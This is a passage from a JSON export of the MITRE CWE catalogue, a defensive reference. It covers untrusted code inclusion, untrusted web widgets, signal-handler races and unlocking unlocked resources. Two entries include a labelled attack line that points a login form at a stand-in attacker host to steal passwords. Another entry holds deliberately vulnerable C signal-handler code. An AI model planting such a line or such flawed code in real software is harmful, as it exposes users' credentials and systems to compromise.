(CWE-415).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5051"},{"Reference":"CVE-2001-1349","Description":"unsafe calls to library functions from signal handler","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1349"},{"Reference":"CVE-2004-0794","Description":"SIGURG can be used to remotely interrupt signal handler; other variants exist.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0794"},{"Reference":"CVE-2004-2259","Description":"SIGCHLD signal to FTP server can cause crash under heavy load while executing non-reentrant functions like malloc/free.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2259"},{"Reference":"CVE-2002-1563","Description":"SIGCHLD not blocked in a daemon loop while counter is modified, causing counter to get out of sync.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1563"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"SIG31-C","Entry_Name":"Do not access or modify shared objects in signal handlers"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-360"}},{"attr":{"@_External_Reference_ID":"REF-361"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2010-11-08"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Demonstrative_Examples, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}]}},"829":{"attr":{"@_ID":"829","@_Name":"Inclusion of Functionality from Untrusted Control Sphere","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software imports, requires, or includes executable functionality (such as a library) from a source that is outside of the intended control sphere.","Extended_Description":{"xhtml:p":["When including third-party functionality, such as a web widget, library, or other source of functionality, the software must effectively trust that functionality. Without sufficient protection mechanisms, the functionality could be malicious in nature (either by coming from an untrusted source, being spoofed, or being modified in transit from a trusted source). The functionality might also contain its own weaknesses, or grant access to additional functionality and state information that should be kept private to the base system, such as system state information, sensitive application data, or the DOM of a web application.","This might lead to many different consequences depending on the included functionality, but some examples include injection of malware, information exposure by granting excessive privileges or permissions to the untrusted functionality, DOM-based XSS vulnerabilities, stealing user\'s cookies, or open redirect to malware (CWE-601)."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"669","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"669","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Code or Commands","Note":"An attacker could insert malicious functionality into the program by causing the program to download code that the attacker has placed into the untrusted control sphere, such as a malicious web site."}},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Bytecode Weakness Analysis - including disassembler + source code weakness analysis"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Forced Path Execution","Monitored Virtual Environment - run potentially malicious code in sandbox / wrapper / virtual machine, see if it does anything suspicious"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Manual Source Code Review (not inspections)"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Focused Manual Spotcheck - Focused manual analysis of source"}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)","Formal Methods / Correct-By-Construction"]}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Attack Modeling"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-4"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":"Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid."},{"attr":{"@_Mitigation_ID":"MIT-21.1"},"Phase":"Architecture and Design","Strategy":"Enforcement by Conversion","Description":{"xhtml:p":["When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs.","For example, ID 1 could map to \\"inbox.txt\\" and ID 2 could map to \\"profile.txt\\". Features such as the ESAPI AccessReferenceMap [REF-45] provide this capability."]}},{"attr":{"@_Mitigation_ID":"MIT-15"},"Phase":"Architecture and Design","Description":"For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server."},{"attr":{"@_Mitigation_ID":"MIT-22"},"Phase":["Architecture and Design","Operation"],"Strategy":"Sandbox or Jail","Description":{"xhtml:p":["Run the code in a \\"jail\\" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software.","OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations.","This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise.","Be careful to avoid CWE-243 and other weaknesses related to jails."]},"Effectiveness":"Limited","Effectiveness_Notes":"The effectiveness of this mitigation depends on the prevention capabilities of the specific sandbox or jail being used and might only help to reduce the scope of an attack, such as restricting the attacker to certain system calls or limiting the portion of the file system that can be accessed."},{"attr":{"@_Mitigation_ID":"MIT-17"},"Phase":["Architecture and Design","Operation"],"Strategy":"Environment Hardening","Description":"Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations."},{"attr":{"@_Mitigation_ID":"MIT-5.1"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.","When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single \\".\\" character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as \\"/\\" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434.","Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering \\"/\\" is insufficient protection if the filesystem also supports the use of \\"\\\\\\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if \\"../\\" sequences are removed from the \\".../...//\\" string in a sequential fashion, two instances of \\"../\\" would be removed from the original string, but the remaining characters would still form the \\"../\\" string."]},"Effectiveness":"High"},{"attr":{"@_Mitigation_ID":"MIT-34"},"Phase":["Architecture and Design","Operation"],"Strategy":"Attack Surface Reduction","Description":{"xhtml:p":["Store library, include, and utility files outside of the web document root, if possible. Otherwise, store them in a separate directory and use the web server\'s access control capabilities to prevent attackers from directly requesting them. One common practice is to define a fixed constant in each calling program, then check for the existence of the constant in the library/include file; if the constant does not exist, then the file was directly requested, and it can exit immediately.","This significantly reduces the chance of an attacker being able to bypass any protection mechanisms that are in the base program but not in the include files. It will also reduce the attack surface."]}},{"attr":{"@_Mitigation_ID":"MIT-6"},"Phase":["Architecture and Design","Implementation"],"Strategy":"Attack Surface Reduction","Description":{"xhtml:p":["Understand all the potential areas where untrusted inputs can enter your software: parameters or arguments, cookies, anything read from the network, environment variables, reverse DNS lookups, query results, request headers, URL components, e-mail, files, filenames, databases, and any external systems that provide data to the application. Remember that such inputs may be obtained indirectly through API calls.","Many file inclusion problems occur because the programmer assumed that certain inputs could not be modified, especially for cookies and URL components."]}},{"attr":{"@_Mitigation_ID":"MIT-29"},"Phase":"Operation","Strategy":"Firewall","Description":"Use an application firewall that can detect attacks against this weakness. It can be beneficial in cases in which the code cannot be fixed (because it is controlled by a third party), as an emergency prevention measure while more comprehensive software assurance measures are applied, or to provide defense in depth.","Effectiveness":"Moderate","Effectiveness_Notes":"An application firewall might not cover all possible input vectors. In addition, attack techniques might be available to bypass the protection mechanism, such as using malformed inputs that can still be processed by the component that receives those inputs. Depending on functionality, an application firewall might inadvertently reject or modify legitimate requests. Finally, some manual effort may be required for customization."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-94"},"Intro_Text":"This login webpage includes a weather widget from an external website:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"HTML"},"xhtml:div":{"#text":"<div class=\\"header\\"> Welcome!</div>","xhtml:div":{"#text":"<div id=\\"loginBox\\">Please Login:</div><div id=\\"WeatherWidget\\"></div>","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"<form id =\\"loginForm\\" name=\\"loginForm\\" action=\\"login.php\\" method=\\"post\\">Username: <input type=\\"text\\" name=\\"username\\" /><br/>Password: <input type=\\"password\\" name=\\"password\\" /><input type=\\"submit\\" value=\\"Login\\" /></form>","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","",""]},{"#text":"<script type=\\"text/javascript\\" src=\\"externalDomain.example.com/weatherwidget.js\\"></script>","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":""}}},{"attr":{"@_Nature":"attack","@_Language":"JavaScript"},"xhtml:div":{"#text":"document.getElementById(\'loginForm\').action = \\"ATTACK.example.com/stealPassword.php\\";","xhtml:br":["",""],"xhtml:i":"...Weather widget code...."}}],"Body_Text":["This webpage is now only as secure as the external domain it is including functionality from. If an attacker compromised the external domain and could add malicious scripts to the weatherwidget.js file, the attacker would have complete control, as seen in any XSS weakness (CWE-79).","For example, user login information could easily be stolen with a single line added to weatherwidget.js:","This line of javascript changes the login form\'s original action target from the original website to an attack site. As a result, if a user attempts to login their username and password will be sent directly to the attack site."]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2010-2076","Description":"Product does not properly reject DTDs in SOAP messages, which allows remote attackers to read arbitrary files, send HTTP requests to intranet servers, or cause a denial of service.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2076"},{"Reference":"CVE-2004-0285","Description":"Modification of assumed-immutable configuration variable in include file allows file inclusion via direct request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0285"},{"Reference":"CVE-2004-0030","Description":"Modification of assumed-immutable configuration variable in include file allows file inclusion via direct request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0030"},{"Reference":"CVE-2004-0068","Description":"Modification of assumed-immutable configuration variable in include file allows file inclusion via direct request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0068"},{"Reference":"CVE-2005-2157","Description":"Modification of assumed-immutable configuration variable in include file allows file inclusion via direct request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2157"},{"Reference":"CVE-2005-2162","Description":"Modification of assumed-immutable configuration variable in include file allows file inclusion via direct request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2162"},{"Reference":"CVE-2005-2198","Description":"Modification of assumed-immutable configuration variable in include file allows file inclusion via direct request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2198"},{"Reference":"CVE-2004-0128","Description":"Modification of assumed-immutable variable in configuration script leads to file inclusion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0128"},{"Reference":"CVE-2005-1864","Description":"PHP file inclusion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1864"},{"Reference":"CVE-2005-1869","Description":"PHP file inclusion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1869"},{"Reference":"CVE-2005-1870","Description":"PHP file inclusion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1870"},{"Reference":"CVE-2005-2154","Description":"PHP local file inclusion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2154"},{"Reference":"CVE-2002-1704","Description":"PHP remote file include.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1704"},{"Reference":"CVE-2002-1707","Description":"PHP remote file include.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1707"},{"Reference":"CVE-2005-1964","Description":"PHP remote file include.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1964"},{"Reference":"CVE-2005-1681","Description":"PHP remote file include.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1681"},{"Reference":"CVE-2005-2086","Description":"PHP remote file include.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2086"},{"Reference":"CVE-2004-0127","Description":"Directory traversal vulnerability in PHP include statement.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0127"},{"Reference":"CVE-2005-1971","Description":"Directory traversal vulnerability in PHP include statement.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1971"},{"Reference":"CVE-2005-3335","Description":"PHP file inclusion issue, both remote and local; local include uses \\"..\\" and \\"%00\\" characters as a manipulation, but many remote file inclusion issues probably have this vector.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3335"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"175"}},{"attr":{"@_CAPEC_ID":"201"}},{"attr":{"@_CAPEC_ID":"228"}},{"attr":{"@_CAPEC_ID":"251"}},{"attr":{"@_CAPEC_ID":"252"}},{"attr":{"@_CAPEC_ID":"253"}},{"attr":{"@_CAPEC_ID":"263"}},{"attr":{"@_CAPEC_ID":"549"}},{"attr":{"@_CAPEC_ID":"660"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-45"}},{"attr":{"@_External_Reference_ID":"REF-76"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2010-11-29"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Observed_Examples, Potential_Mitigations, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Potential_Mitigations, Related_Attack_Patterns"}]}},"830":{"attr":{"@_ID":"830","@_Name":"Inclusion of Web Functionality from an Untrusted Source","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software includes web functionality (such as a web widget) from another domain, which causes it to operate within the domain of the software, potentially granting total access and control of the software to the untrusted source.","Extended_Description":{"xhtml:p":["Including third party functionality in a web-based environment is risky, especially if the source of the functionality is untrusted.","Even if the third party is a trusted source, the software may still be exposed to attacks and malicious behavior if that trusted source is compromised, or if the code is modified in transmission from the third party to the software.","This weakness is common in \\"mashup\\" development on the web, which may include source functionality from other domains. For example, Javascript-based web widgets may be inserted by using \'<SCRIPT SRC=\\"http://other.domain.here\\">\' tags, which causes the code to run in the domain of the software, not the remote site from which the widget was loaded. As a result, the included code has access to the local DOM, including cookies and other data that the developer might not want the remote site to be able to access.","Such dependencies may be desirable, or even required, but sometimes programmers are not aware that a dependency exists."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"829","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Code or Commands"}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-94"},"Intro_Text":"This login webpage includes a weather widget from an external website:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"HTML"},"xhtml:div":{"#text":"<div class=\\"header\\"> Welcome!</div>","xhtml:div":{"#text":"<div id=\\"loginBox\\">Please Login:</div><div id=\\"WeatherWidget\\"></div>","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"<form id =\\"loginForm\\" name=\\"loginForm\\" action=\\"login.php\\" method=\\"post\\">Username: <input type=\\"text\\" name=\\"username\\" /><br/>Password: <input type=\\"password\\" name=\\"password\\" /><input type=\\"submit\\" value=\\"Login\\" /></form>","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","",""]},{"#text":"<script type=\\"text/javascript\\" src=\\"externalDomain.example.com/weatherwidget.js\\"></script>","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":""}}},{"attr":{"@_Nature":"attack","@_Language":"JavaScript"},"xhtml:div":{"#text":"document.getElementById(\'loginForm\').action = \\"ATTACK.example.com/stealPassword.php\\";","xhtml:br":["",""],"xhtml:i":"...Weather widget code...."}}],"Body_Text":["This webpage is now only as secure as the external domain it is including functionality from. If an attacker compromised the external domain and could add malicious scripts to the weatherwidget.js file, the attacker would have complete control, as seen in any XSS weakness (CWE-79).","For example, user login information could easily be stolen with a single line added to weatherwidget.js:","This line of javascript changes the login form\'s original action target from the original website to an attack site. As a result, if a user attempts to login their username and password will be sent directly to the attack site."]}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-778"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2010-12-08"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"831":{"attr":{"@_ID":"831","@_Name":"Signal Handler Function Associated with Multiple Signals","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software defines a function that is used as a handler for more than one signal.","Extended_Description":{"xhtml:p":["While sometimes intentional and safe, when the same function is used to handle multiple signals, a race condition could occur if the function uses any state outside of its local declaration, such as global variables or non-reentrant functions, or has any side effects.","An attacker could send one signal that invokes the handler function; in many OSes, this will typically prevent the same signal from invoking the handler again, at least until the handler function has completed execution. However, the attacker could then send a different signal that is associated with the same handler function. This could interrupt the original handler function while it is still executing. If there is shared state, then the state could be corrupted. This can lead to a variety of potential consequences depending on context, including denial of service and code execution.","Another rarely-explored possibility arises when the signal handler is only designed to be executed once (if at all). By sending multiple signals, an attacker could invoke the function more than once. This may generate extra, unintended side effects. A race condition might not even be necessary; the attacker could send one signal, wait until it is handled, then send the other signal."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"364","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Common_Consequences":{"Consequence":{"Scope":["Availability","Integrity","Confidentiality","Access Control","Other"],"Impact":["DoS: Crash, Exit, or Restart","Execute Unauthorized Code or Commands","Read Application Data","Gain Privileges or Assume Identity","Bypass Protection Mechanism","Varies by Context"],"Note":"The most common consequence will be a corruption of the state of the software, possibly leading to a crash or exit. However, if the signal handler is operating on state variables for security relevant libraries or protection mechanisms, the consequences can be far more severe, including protection mechanism bypass, privilege escalation, or information exposure."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"This code registers the same signal handler function with two different signals.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"void handler (int sigNum) {}int main (int argc, char* argv[]) {}","xhtml:div":[{"#text":"...","attr":{"@_style":"margin-left:10px;"}},{"#text":"signal(SIGUSR1, handler)signal(SIGUSR2, handler)","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}],"xhtml:br":["",""]}}},{"attr":{"@_Demonstrative_Example_ID":"DX-26"},"Intro_Text":"This code registers the same signal handler function with two different signals (CWE-831). If those signals are sent to the process, the handler creates a log message (specified in the first argument to the program) and exits.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char *logMessage;void handler (int sigNum) {}int main (int argc, char* argv[]) {}","xhtml:br":["","","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"syslog(LOG_NOTICE, \\"%s\\\\n\\", logMessage);free(logMessage);sleep(10);exit(0);","xhtml:br":["","","","",""],"xhtml:i":"/* artificially increase the size of the timing window to make demonstration of this weakness easier. */"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"logMessage = strdup(argv[1]);signal(SIGHUP, handler);signal(SIGTERM, handler);sleep(10);","xhtml:br":["","","","","","",""],"xhtml:i":["/* Register signal handlers. */","/* artificially increase the size of the timing window to make demonstration of this weakness easier. */"]}}]}},"Body_Text":["The handler function uses global state (globalVar and logMessage), and it can be called by both the SIGHUP and SIGTERM signals. An attack scenario might follow these lines:",{"xhtml:ul":{"xhtml:li":[{"xhtml:div":"The program begins execution, initializes logMessage, and registers the signal handlers for SIGHUP and SIGTERM."},{"xhtml:div":"The program begins its \\"normal\\" functionality, which is simplified as sleep(), but could be any functionality that consumes some time."},{"xhtml:div":"The attacker sends SIGHUP, which invokes handler (call this \\"SIGHUP-handler\\")."},{"xhtml:div":"SIGHUP-handler begins to execute, calling syslog()."},{"xhtml:div":"syslog() calls malloc(), which is non-reentrant. malloc() begins to modify metadata to manage the heap."},{"xhtml:div":"The attacker then sends SIGTERM."},{"xhtml:div":"SIGHUP-handler is interrupted, but syslog\'s malloc call is still executing and has not finished modifying its metadata."},{"xhtml:div":"The SIGTERM handler is invoked."},{"xhtml:div":"SIGTERM-handler records the log message using syslog(), then frees the logMessage variable."}]}},"At this point, the state of the heap is uncertain, because malloc is still modifying the metadata for the heap; the metadata might be in an inconsistent state. The SIGTERM-handler call to free() is assuming that the metadata is inconsistent, possibly causing it to write data to the wrong location while managing the heap. The result is memory corruption, which could lead to a crash or even code execution, depending on the circumstances under which the code is running.","Note that this is an adaptation of a classic example as originally presented by Michal Zalewski [REF-360]; the original example was shown to be exploitable for code execution.","Also note that the strdup(argv[1]) call contains a potential buffer over-read (CWE-126) if the program is called without any arguments, because argc would be 0, and argv[1] would point outside the bounds of the array."]}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-360"}},{"attr":{"@_External_Reference_ID":"REF-361"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2010-12-12"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Demonstrative_Examples, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"832":{"attr":{"@_ID":"832","@_Name":"Unlock of a Resource that is not Locked","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software attempts to unlock a resource that is not locked.","Extended_Description":"Depending on the locking functionality, an unlock of a non-locked resource might cause memory corruption or other modification to the resource (or its associated metadata that is used for tracking locks).","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"667","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Confidentiality","Availability","Other"],"Impact":["DoS: Crash, Exit, or Restart","Execute Unauthorized Code or Commands","Modify Memory","Other"],"Note":"Depending on the locking being used, an unlock operation might not have any adverse effects. When effects exist, the most common consequence will be a corruption of the state of the software, possibly leading to a crash or exit; depending on the implementation of the unlocking, memory corruption or code execution could occur."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2010-4210","Description":"function in OS kernel unlocks a mutex that was not previously locked, causing a panic or overwrite of arbitrary 